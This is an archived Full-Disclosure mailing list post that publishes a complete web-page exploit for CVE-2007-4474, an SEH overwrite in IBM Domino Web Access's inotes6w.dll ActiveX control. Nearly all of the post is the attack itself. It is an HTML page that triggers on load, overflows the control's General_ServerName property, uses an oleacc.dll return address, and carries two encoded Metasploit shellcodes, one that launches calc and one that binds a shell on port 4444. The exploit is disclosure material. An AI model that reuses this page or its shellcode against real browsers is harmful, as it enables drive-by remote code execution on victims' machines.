OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
[Full-disclosure] IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite Exploit

elazarhushmail.com
Date: Mon Dec 31 2007 - 08:55:22 CST


This one is the same offset as dwa7w and the same class id as
inotes6. Basically inotes6 and inotes6w share the same class id,
except that inotes6w is unicode. dwa7w is unicode and has a
different class id. Code is inline, I would attach it except for
the fact that I set off way to many av scanners with my last
messages.

-----------------
<!--
written by e.b.
IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite
Exploit
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, inotes6w.dll
version 6.0.48.0
Thanks to h.d.m. and the Metasploit crew
-->
<html>
 <head>
  <title>IBM Domino Web Access Upload Module inotes6w.dll SEH
Overwrite Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
     var buf = unescape("%u4141");
     while (buf.length <= 2461) buf = buf + unescape("%u4141");

// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe
Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
http://metasploit.com
var shellcode2 =
unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +
                          
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" +
                          
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" +
                          
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" +
                          
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" +
                          
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" +
                          
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" +
                          
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" +
                          
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" +
                          
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" +
                          
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" +
                          
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" +
                          
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" +
                          
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" +
                          
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" +
                          
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" +
                          
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" +
                          
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" +
                          
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" +
                          
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" +
                          
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" +
                          
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" +
                          
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" +
                          
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" +
                          
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" +
                          
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" +
                          
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" +
                          
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" +
                          
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +
                          
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" +
                          
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" +
                          
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" +
                          
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" +
                          
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" +
                          
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" +
                          
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" +
                          
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" +
                          
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" +
                          
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" +
                          
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" +
                          
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" +
                          
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +
                          "%u684f%u3956%u386f%u4350");

                var next_seh_pointer = unescape("%u06EB%u9090"); //2 byte jump
                
                //oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop -
retbis
                    //no SafeSEH
                var seh_handler = unescape("%u6950%u74C9");
        
                var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");

                var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 +
nop;
                
                obj.General_ServerName = m;
                    obj.InstallBrowserHelperDll();

   }
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271-
00A024A51325">
     Unable to create object
    </object>
 </body>
</html>

-----------------

Elazar

--
Dreaming of getting away? Click here for an island experience in Hawaii.
http://tagline.hushmail.com/fc/Ioyw6h4ePlomRvZZ2JKIMtgcHqjQSFiSke3Uq5lK03ZKdfW4js8ckw/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/